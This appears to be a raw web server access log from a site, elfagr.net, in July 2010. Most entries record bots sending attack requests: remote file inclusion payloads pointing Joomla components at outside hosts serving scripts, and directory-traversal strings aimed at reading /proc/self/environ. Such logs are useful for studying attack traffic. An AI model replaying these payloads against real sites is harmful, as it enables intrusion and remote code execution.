83.168.244.15 - - [02/Jul/2010:11:27:31 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
83.168.244.15 - - [02/Jul/2010:11:27:32 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:11:27:54 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:11:27:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
67.218.116.169 - - [02/Jul/2010:11:30:04 -0700] "GET /logs/access_100603.log HTTP/1.1" 200 1769472 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:15 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:16 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:16 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:06 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [02/Jul/2010:11:30:07 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:33:37 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:33:37 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:33:37 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:11:36:48 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:11:36:59 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
121.78.118.123 - - [02/Jul/2010:11:38:09 -0700] "GET /logs/index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
121.78.118.123 - - [02/Jul/2010:11:38:10 -0700] "GET /index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:11:43:37 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:43:37 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:43:48 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:43:37 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:11:57:44 -0700] "GET /logs/access_100218.log HTTP/1.1" 200 533094 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
212.117.164.64 - - [02/Jul/2010:12:01:25 -0700] "GET /logs/scripts.log HTTP/1.0" 200 26468 "http://www.elfagr.net/logs/scripts.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:26 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:37 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:37 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:30 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:30 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:07:30 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:12:07:51 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:12:08:01 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:12:08:01 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:12:08:27 -0700] "GET /logs/scripts.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:09:15 -0700] "GET /logs/access.log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:09:15 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:09:15 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.116.221.167 - - [02/Jul/2010:12:21:15 -0700] "GET /logs/access_091203.log HTTP/1.0" 404 - "http://www.elfagr.net/logs/access_091203.log" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.elfagr.net"
93.116.221.167 - - [02/Jul/2010:12:21:06 -0700] "GET / HTTP/1.0" 200 1449 "http://www.elfagr.net/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:34:07 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:34:07 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:34:07 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:34:43 -0700] "GET /logs/scripts.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:12:41:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:12:41:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:12:42:02 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:12:41:52 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:43:28 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:43:38 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:43:28 -0700] "GET /logs/access.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:12:44:08 -0700] "GET /logs/scripts.log%20%20/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
193.246.108.253 - - [02/Jul/2010:12:47:39 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
193.246.108.253 - - [02/Jul/2010:12:47:50 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:12:50:52 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:12:50:42 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:12:53:24 -0700] "GET /logs/access_100128.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:12:59:21 -0700] "GET /logs/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:12:59:22 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:00:26 -0700] "GET /logs/access_100114.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:00:26 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:00:26 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:00:30 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
121.1.130.140 - - [02/Jul/2010:13:00:59 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:13:02:32 -0700] "GET /logs/access_100107.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:13:02:32 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:13:02:32 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
188.165.213.8 - - [02/Jul/2010:13:02:57 -0700] "GET /logs/access_091126.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:06:25 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:06:35 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:06:25 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:08:52 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:08:41 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:08:52 -0700] "GET /logs/access_100114.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.63.250.191 - - [02/Jul/2010:13:09:14 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.dfr.com.pl/sklep/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:09:24 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:09:24 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:10:11 -0700] "GET /logs/scripts.log//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:10:11 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:10:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:11:10 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:11:20 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:11:10 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:11:22 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:13:11:39 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:12:11 -0700] "GET /logs/scripts.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:12:46 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:12:35 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:12:35 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:13:47 -0700] "GET /logs/scripts.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:13:54 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:13:54 -0700] "GET /logs/access.log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:13:54 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:19:06 -0700] "GET /logs/access.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:19:06 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:19:06 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:26:06 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:26:06 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:26:06 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:28:48 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:28:58 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
91.121.26.63 - - [02/Jul/2010:13:28:48 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:13:30:13 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:13:30:13 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:13:30:24 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:41:08 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:41:08 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:41:08 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:42:41 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:42:31 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:42:31 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:46:32 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:46:43 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:46:32 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:48:10 -0700] "GET /logs/access.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:48:20 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:48:20 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:13:49:11 -0700] "GET /logs/scripts.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:13:50:07 -0700] "GET /logs/access_100114.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:52:58 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:52:58 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:53:08 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:13:54:09 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
